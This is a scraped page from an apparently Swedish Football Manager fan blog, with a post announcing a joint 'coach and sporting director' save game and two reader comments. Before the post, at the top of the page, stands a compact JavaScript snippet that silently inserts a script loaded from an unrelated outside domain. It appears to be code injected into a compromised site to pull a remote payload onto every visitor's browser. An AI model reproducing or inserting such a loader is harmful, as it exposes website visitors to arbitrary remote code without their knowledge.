;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Tränaren & Sportchefen – FMSweden
Meny Stäng

Tränaren & Sportchefen

Något sent och med en save rikare, kommer nu AW:n ut såhär på lördagskvällen. Som den gör det också. Jag och Danne Nilsson har ju tidigare samarbetat i våran save med Blåvitt, Groningen och Fiorentina, men nu tar vi det ett steg till. Välkomna till Tränaren och sportchefen-saven..

Såhär kommer det gå till.

Jag kommer vara tränare, bestämma allt vad gäller taktik, laguttagning och spelidé. Jag kommer driva saven framåt. Jag kommer sköta allt som en tränare gör enkelt bestämt, men med en twist.

Jag kommer inte värva spelare, jag kommer inte ens välja vilket lag jag ska ha hand om. Jag kommer lämna mitt liv i händerna på min sportchef. Eller sportchef/agent skulle man kunna säga.

Danne kommer bestämma klubb, han kommer värva spelare, han kommer bestämma allt vad gäller spelare in och spelare ut. Jag kommer givetvis bestämma vilken position jag vill ha en spelare på, men det skulle också kunna vara så att jag vill ha en vänsterback och Danne säger: här har du en Forward.

Allt för att göra livet surare för sin tränare.

Saven kommer börja som arbetslös i de ligor som Danne laddat ner, men jag kommer göra min manager själv.

Vi kommer redovisa allt här under AW under ett par veckor eller så länge vi märker att det kan vara intressant. Skulle vi märka att det finns ett intresse skulle man också kunna vända på steken i en ny save, eller varför inte blanda in er läsare?

Så jag säger trevlig kväll och håller tummarna för att min sportchef har vaknat på rätt sida imorgon.

Just det, en sak till.

Vad ska min manager vara ifrån? Vad ska hans initialer vara? Förslag nedan

SKÅL

Tobbe

 

Please wait...

Liknande Inlägg

8 kommentarer

 1. Phansell

  Sjukligt rolig idé 😀 Kommer följa slaviskt.

  Tränarförslag:
  Förslag 1, Craig MacLean – Äldre skotte som kör 4-4-2 och vägrar ändra på sig. Det är han som bestämmer. Punkt.
  Förslag 2, Nuno Paiva – Yngre portugis som är lite mer flexibel i sin taktik och sin framförhållning till sina spelare.

  En twist och ett bonusförslag:
  Maida Cesari – Kvinna runt 35. Fantastiska kvalitéer taktiskt och ett lovande namn som tränare. Spelar gärna en 5-3-2 och Conte som förebild.

  • Daniel Nilsson

   Vi kommer nog köra lite blandat tänker jag. Tidigare, när jag agerat scout åt Tobbe på ett annat save, så skickade han över filen efter varje spelad säsong och jag scoutade. Nu blir det lite svårare att ha en sådan renodlad “övergång” men tänker att vi alternerar mellan det och lite mer intensivt snack över internet.

Lämna ett svar